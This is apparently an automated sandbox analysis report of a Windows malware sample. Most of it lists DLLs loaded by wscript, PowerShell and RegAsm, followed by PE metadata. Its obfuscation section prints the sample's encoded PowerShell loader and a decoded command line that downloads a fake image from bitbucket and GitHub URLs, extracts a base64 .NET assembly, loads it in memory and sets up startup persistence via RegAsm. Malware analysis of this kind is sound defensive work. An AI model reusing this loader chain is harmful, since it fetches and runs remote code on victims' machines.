                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: esdsip.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: Google Chrome.lnk.10.drLNK file: ..\..\..\Program Files\Google\Chrome\Application\chrome.exe
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: sRMytgfRpJ.exeStatic PE information: Image base 0x140000000 > 0x60000000
                  Source: sRMytgfRpJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: sRMytgfRpJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: sRMytgfRpJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: sRMytgfRpJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: sRMytgfRpJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: sRMytgfRpJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: sRMytgfRpJ.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                  Source: sRMytgfRpJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: wextract.pdb source: sRMytgfRpJ.exe
                  Source: Binary string: wextract.pdbGCTL source: sRMytgfRpJ.exe
                  Source: sRMytgfRpJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: sRMytgfRpJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: sRMytgfRpJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: sRMytgfRpJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: sRMytgfRpJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                  Data Obfuscation

                  barindex
                  Found suspicious powershell code related to unpacking or dynamic code loading
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#HM#a#Bp#GU#b#Bk#GE#Z#Bh#HM#LwBn#HM#Z#Bn#Gg#agBq#C8#Z#Bv#Hc#bgBs#G8#YQBk#HM#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#MQ#4#DE#MQ#3#DM#NQ#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#
                  Suspicious powershell command line found
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#HM#a#Bp#GU#b#Bk#GE#Z#Bh#HM#LwBn#HM#Z#Bn#Gg#agBq#C8#Z#Bv#Hc#bgBs#G8#YQBk#HM#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#MQ#4#DE#MQ#3#DM#NQ#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.52liw/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
